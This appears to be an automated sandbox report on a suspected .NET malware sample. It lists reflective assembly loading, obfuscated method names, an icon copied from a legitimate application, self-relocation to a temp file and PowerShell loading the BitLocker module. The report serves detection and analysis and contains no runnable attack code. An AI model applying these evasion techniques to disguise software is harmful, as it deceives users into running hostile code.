Source: .05.2024.exe, Form1.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 4.2..05.2024.exe.50f0000.6.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, CVno4Y1XnIIFZVy7wf.cs	.Net Code: T4TOw43a2T System.Reflection.Assembly.Load(byte[])
Source: 4.2..05.2024.exe.2458214.0.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, CVno4Y1XnIIFZVy7wf.cs	.Net Code: T4TOw43a2T System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 4_2_007DD421 pushfd ; ret	4_2_007DD451
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_00EB24B9 push 8BFFFFFFh; retf	10_2_00EB24BF
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D9695 push es; iretd	10_2_064D9698
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D8BCD push es; retf	10_2_064D8BD0
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064D44E8 push eax; iretd	10_2_064D44E9
Source: C:\Users\user\Desktop\.05.2024.exe	Code function: 10_2_064DC899 push es; retf	10_2_064DC8A0

Source: .05.2024.exe

Static PE information: section name: .text entropy: 7.935175361097534

Source: 4.2..05.2024.exe.50f0000.6.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, VFmXHZW7JP0Pgk7koc4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'atw0lP5xjA', 'VDs068Oa0x', 'LkX0sZpsKT', 'IGv0oufRmW', 'Sjw0XMyaAL', 'OAK0fx2lac', 'TH70mseXZp'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, RM1sFhuOmQ4CpkpHY3.cs	High entropy of concatenated method names: 'UghbZayxIg', 'BC1bTMpVhr', 'b8ab5LYqKD', 'qfpbSMtOam', 'Lq3beyviIM', 'FsxbGNbGnc', 'k7fbKQDRV1', 'd6ObyaHs1g', 'hiobamhulX', 'e1IbLHUKrP'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, gx046K55H72sPX5mC0.cs	High entropy of concatenated method names: 'Fhydt9vJ0b', 'a07dRRkMt1', 'zE0d4QOVnh', 'p10dksqPSK', 'Mbcd13U0e1', 'lyN4XJSKXf', 'xyh4fL0Hl3', 'cG74mCJemJ', 'YiG4AyIe0x', 'KDv4gttyj3'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, MnLpvxo6XQqrp280Cb.cs	High entropy of concatenated method names: 'UygJQSr1Rp', 's6XJUgYaDE', 'ToString', 'sIZJhdwvem', 'BRUJRhnEY9', 'NbHJjcSPmx', 'wXZJ4eMhqr', 'ii8JdQ7CkR', 'i3QJkfKDfS', 'x1AJ1wgJfG'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, bYq43WcWlGa3EKLyCU.cs	High entropy of concatenated method names: 'ngrBWuwWDh', 'k8qB7JvSFw', 'tL2BOqVNHY', 'vYfBh6QXuM', 'BoPBRhO6qe', 'zn9B4c7SEX', 'QX8BdEeiTs', 'GjxCmWuBAZ', 'ATvCAANPkX', 'NyxCgDwASX'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, fU3DfwTBIE4cZ8OTVc.cs	High entropy of concatenated method names: 'SYQjv7vlid', 'au4jiVXsWX', 'aZDjZEelZ3', 'N6RjTb27Ua', 'NnAjMlVWWo', 'WxRjNqNE5o', 'WlGjJJuLGS', 'hSvjCFUasX', 'wSGjB0htRA', 'Q4Uj0vYf84'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, CVno4Y1XnIIFZVy7wf.cs	High entropy of concatenated method names: 'Q4c7t2991q', 'v827hgRX5H', 'c7Z7RhwtEO', 'CoQ7jUC6Ri', 'XgC74tYNFD', 'foA7dtVFX9', 'sjW7kRcA93', 'cGJ71QOTrm', 'kml7I4G81L', 'bXT7QsVpFs'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, S0vsTIrA18Va8EYoaV.cs	High entropy of concatenated method names: 'WOQ4n9Vs1s', 'Bo54VeajGM', 'HuyjxwZ0K2', 'okUjeP3lHi', 'XG7jGsy17I', 'N1ujpjXI6I', 'pqhjKNLLyJ', 'JA1jynp6K5', 'mf9jYAwthC', 'wt5jalqRoT'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, RxxUrkYAuyHFQwdyOD.cs	High entropy of concatenated method names: 'hHukFrf2bx', 'gGik2f3mty', 'TChkwIj2ru', 'Q0WkvlU81X', 'sXTkna2SZW', 'tdGki9ISGV', 'iKckViFkB8', 'KgDkZDaRYs', 'XX5kTCPlHc', 'LIpkrasXJp'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, i2F7SBAGAhJFMOIL9B.cs	High entropy of concatenated method names: 'BvZCheU4HQ', 'YnHCR4AZtB', 'q9dCjw8uow', 'FQCC4h3fTv', 'ObICdmRst9', 'dQOCkCj65A', 'xhMC1Ia8N5', 'JNLCIw7MrN', 'BPMCQQ0NuF', 'GjxCU31U0r'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, LZmBjlKOlBtoKN82XC.cs	High entropy of concatenated method names: 'XQckhyMLhh', 'pEXkjWyY3u', 'HhlkdKrUmJ', 'ICbdcFgvVh', 'TiDdzQc8pr', 'CeFkPdOR9l', 'L04kWRrgBr', 'EKbkDJc5dt', 'BeGk7taUM0', 'd3wkObtoZK'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, xxN2WiOcQjRod8Lt3r.cs	High entropy of concatenated method names: 'Q76Wkd89SS', 'lrHW109kTb', 'zBIWQE4cZ8', 'dTVWUcs0vs', 'uYoWMaVRx0', 'h6KWN5H72s', 'XfNe5lbXJtAWmeOW82', 'sh3JTSSOfUX9haZWN8', 'RUIWWg6y1S', 'QT1W7FMife'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, Sd89SSZIrH09kTbk8x.cs	High entropy of concatenated method names: 'CBqRl2IqXn', 'N6SR6EblXb', 'SwiRsemSaB', 'RT0RoRkNA9', 'qZIRX3nQ33', 'lXyRfToTXK', 'uGGRmOgH2v', 'WeeRA7UD0r', 'uAuRguxuJ1', 'MBNRcUN6dT'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, ze9bICWP8H5KXkUdiNo.cs	High entropy of concatenated method names: 'fGuBFpZ0xF', 'vbgB295h57', 'cn4BwcaHfv', 'yvkBvig3Lu', 'GyQBnqi33r', 'T3oBiof755', 'pcpBVf18hW', 'JMwBZikp9E', 'y17BTm6Lrd', 'P1UBrBSerC'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, GD7lgCp1W0lR94maf9.cs	High entropy of concatenated method names: 'dBIdsxbvxe', 'lmZdolPHkR', 'C4SdX6Mmef', 'ToString', 'sJOdfuHyit', 'O0UdmClPpc', 'AreZg98rmalgAR0RHGe', 'YP6iw78FIMU71Wpltxo', 'A3QnY28dhyMiScNCrfP'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, ialVLYfpK05Dk09qn4.cs	High entropy of concatenated method names: 'NofJAL9wdr', 'EkBJc5TlN5', 'KLwCPKwq9K', 'jyHCWKVsK2', 'AOgJLNQ5cJ', 'FUnJ3cJkZq', 'f4bJuOMaIr', 'enrJlfNQdH', 'jRoJ60Yxuh', 'RqdJsyw387'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, jTriHlRS6fb13iYYan.cs	High entropy of concatenated method names: 'Dispose', 'ArPWgon6Ns', 'ogpDSmNx0b', 'kkvwwRd4Oo', 'Yd2WcF7SBG', 'WhJWzFMOIL', 'ProcessDialogKey', 'wBDDPArKMd', 'y5bDWCw6n6', 'pvQDDDYq43'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, AgcMe6ldbDYmoAh24H.cs	High entropy of concatenated method names: 'rEqMaGboG2', 'ehsM3sOyOR', 'St9MlpLdjQ', 'KnGM6EJYJB', 'WW2MSGm4xZ', 'XRFMxuYbD6', 'cdSMe9ca5S', 'uYoMGXHxwj', 'XtFMpJLDnX', 'iDvMK68YHg'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, YKhxO4D5CQmSD3LAAi.cs	High entropy of concatenated method names: 'rMQwMJ0ZM', 'bmAvp0Wa9', 'xF6i2lN0k', 'atZVZWQlq', 'Xn8TXJy8X', 'fhprEEIUq', 'jNxOokrEHClvSCQ8Fk', 'evuZwBh9X4iEYWFRyV', 'C2G506lKM4f9Sr58LN', 'P6vCpDfSK'
Source: 4.2..05.2024.exe.6f90000.8.raw.unpack, cArKMdg25bCw6n6JvQ.cs	High entropy of concatenated method names: 'eRiC5ZkVGE', 'vM9CS8cYW5', 'pOUCxb14Im', 'rMTCeYmDYi', 'LLGCl3BCc9', 'HQQCGOoDat', 'Next', 'Next', 'Next', 'NextBytes'
Source: 4.2..05.2024.exe.2458214.0.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, VFmXHZW7JP0Pgk7koc4.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'atw0lP5xjA', 'VDs068Oa0x', 'LkX0sZpsKT', 'IGv0oufRmW', 'Sjw0XMyaAL', 'OAK0fx2lac', 'TH70mseXZp'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, RM1sFhuOmQ4CpkpHY3.cs	High entropy of concatenated method names: 'UghbZayxIg', 'BC1bTMpVhr', 'b8ab5LYqKD', 'qfpbSMtOam', 'Lq3beyviIM', 'FsxbGNbGnc', 'k7fbKQDRV1', 'd6ObyaHs1g', 'hiobamhulX', 'e1IbLHUKrP'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, gx046K55H72sPX5mC0.cs	High entropy of concatenated method names: 'Fhydt9vJ0b', 'a07dRRkMt1', 'zE0d4QOVnh', 'p10dksqPSK', 'Mbcd13U0e1', 'lyN4XJSKXf', 'xyh4fL0Hl3', 'cG74mCJemJ', 'YiG4AyIe0x', 'KDv4gttyj3'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, MnLpvxo6XQqrp280Cb.cs	High entropy of concatenated method names: 'UygJQSr1Rp', 's6XJUgYaDE', 'ToString', 'sIZJhdwvem', 'BRUJRhnEY9', 'NbHJjcSPmx', 'wXZJ4eMhqr', 'ii8JdQ7CkR', 'i3QJkfKDfS', 'x1AJ1wgJfG'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, bYq43WcWlGa3EKLyCU.cs	High entropy of concatenated method names: 'ngrBWuwWDh', 'k8qB7JvSFw', 'tL2BOqVNHY', 'vYfBh6QXuM', 'BoPBRhO6qe', 'zn9B4c7SEX', 'QX8BdEeiTs', 'GjxCmWuBAZ', 'ATvCAANPkX', 'NyxCgDwASX'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, fU3DfwTBIE4cZ8OTVc.cs	High entropy of concatenated method names: 'SYQjv7vlid', 'au4jiVXsWX', 'aZDjZEelZ3', 'N6RjTb27Ua', 'NnAjMlVWWo', 'WxRjNqNE5o', 'WlGjJJuLGS', 'hSvjCFUasX', 'wSGjB0htRA', 'Q4Uj0vYf84'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, CVno4Y1XnIIFZVy7wf.cs	High entropy of concatenated method names: 'Q4c7t2991q', 'v827hgRX5H', 'c7Z7RhwtEO', 'CoQ7jUC6Ri', 'XgC74tYNFD', 'foA7dtVFX9', 'sjW7kRcA93', 'cGJ71QOTrm', 'kml7I4G81L', 'bXT7QsVpFs'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, S0vsTIrA18Va8EYoaV.cs	High entropy of concatenated method names: 'WOQ4n9Vs1s', 'Bo54VeajGM', 'HuyjxwZ0K2', 'okUjeP3lHi', 'XG7jGsy17I', 'N1ujpjXI6I', 'pqhjKNLLyJ', 'JA1jynp6K5', 'mf9jYAwthC', 'wt5jalqRoT'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, RxxUrkYAuyHFQwdyOD.cs	High entropy of concatenated method names: 'hHukFrf2bx', 'gGik2f3mty', 'TChkwIj2ru', 'Q0WkvlU81X', 'sXTkna2SZW', 'tdGki9ISGV', 'iKckViFkB8', 'KgDkZDaRYs', 'XX5kTCPlHc', 'LIpkrasXJp'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, i2F7SBAGAhJFMOIL9B.cs	High entropy of concatenated method names: 'BvZCheU4HQ', 'YnHCR4AZtB', 'q9dCjw8uow', 'FQCC4h3fTv', 'ObICdmRst9', 'dQOCkCj65A', 'xhMC1Ia8N5', 'JNLCIw7MrN', 'BPMCQQ0NuF', 'GjxCU31U0r'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, LZmBjlKOlBtoKN82XC.cs	High entropy of concatenated method names: 'XQckhyMLhh', 'pEXkjWyY3u', 'HhlkdKrUmJ', 'ICbdcFgvVh', 'TiDdzQc8pr', 'CeFkPdOR9l', 'L04kWRrgBr', 'EKbkDJc5dt', 'BeGk7taUM0', 'd3wkObtoZK'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, xxN2WiOcQjRod8Lt3r.cs	High entropy of concatenated method names: 'Q76Wkd89SS', 'lrHW109kTb', 'zBIWQE4cZ8', 'dTVWUcs0vs', 'uYoWMaVRx0', 'h6KWN5H72s', 'XfNe5lbXJtAWmeOW82', 'sh3JTSSOfUX9haZWN8', 'RUIWWg6y1S', 'QT1W7FMife'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, Sd89SSZIrH09kTbk8x.cs	High entropy of concatenated method names: 'CBqRl2IqXn', 'N6SR6EblXb', 'SwiRsemSaB', 'RT0RoRkNA9', 'qZIRX3nQ33', 'lXyRfToTXK', 'uGGRmOgH2v', 'WeeRA7UD0r', 'uAuRguxuJ1', 'MBNRcUN6dT'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, ze9bICWP8H5KXkUdiNo.cs	High entropy of concatenated method names: 'fGuBFpZ0xF', 'vbgB295h57', 'cn4BwcaHfv', 'yvkBvig3Lu', 'GyQBnqi33r', 'T3oBiof755', 'pcpBVf18hW', 'JMwBZikp9E', 'y17BTm6Lrd', 'P1UBrBSerC'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, GD7lgCp1W0lR94maf9.cs	High entropy of concatenated method names: 'dBIdsxbvxe', 'lmZdolPHkR', 'C4SdX6Mmef', 'ToString', 'sJOdfuHyit', 'O0UdmClPpc', 'AreZg98rmalgAR0RHGe', 'YP6iw78FIMU71Wpltxo', 'A3QnY28dhyMiScNCrfP'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, ialVLYfpK05Dk09qn4.cs	High entropy of concatenated method names: 'NofJAL9wdr', 'EkBJc5TlN5', 'KLwCPKwq9K', 'jyHCWKVsK2', 'AOgJLNQ5cJ', 'FUnJ3cJkZq', 'f4bJuOMaIr', 'enrJlfNQdH', 'jRoJ60Yxuh', 'RqdJsyw387'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, jTriHlRS6fb13iYYan.cs	High entropy of concatenated method names: 'Dispose', 'ArPWgon6Ns', 'ogpDSmNx0b', 'kkvwwRd4Oo', 'Yd2WcF7SBG', 'WhJWzFMOIL', 'ProcessDialogKey', 'wBDDPArKMd', 'y5bDWCw6n6', 'pvQDDDYq43'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, AgcMe6ldbDYmoAh24H.cs	High entropy of concatenated method names: 'rEqMaGboG2', 'ehsM3sOyOR', 'St9MlpLdjQ', 'KnGM6EJYJB', 'WW2MSGm4xZ', 'XRFMxuYbD6', 'cdSMe9ca5S', 'uYoMGXHxwj', 'XtFMpJLDnX', 'iDvMK68YHg'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, YKhxO4D5CQmSD3LAAi.cs	High entropy of concatenated method names: 'rMQwMJ0ZM', 'bmAvp0Wa9', 'xF6i2lN0k', 'atZVZWQlq', 'Xn8TXJy8X', 'fhprEEIUq', 'jNxOokrEHClvSCQ8Fk', 'evuZwBh9X4iEYWFRyV', 'C2G506lKM4f9Sr58LN', 'P6vCpDfSK'
Source: 4.2..05.2024.exe.348b390.4.raw.unpack, cArKMdg25bCw6n6JvQ.cs	High entropy of concatenated method names: 'eRiC5ZkVGE', 'vM9CS8cYW5', 'pOUCxb14Im', 'rMTCeYmDYi', 'LLGCl3BCc9', 'HQQCGOoDat', 'Next', 'Next', 'Next', 'NextBytes'

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (32).png

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Moves itself to temp directory

Source: c:\users\user\desktop\.05.2024.exe

File moved: C:\Users\user\AppData\Local\Temp\tmpG601.tmp

Jump to behavior

Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\.05.2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
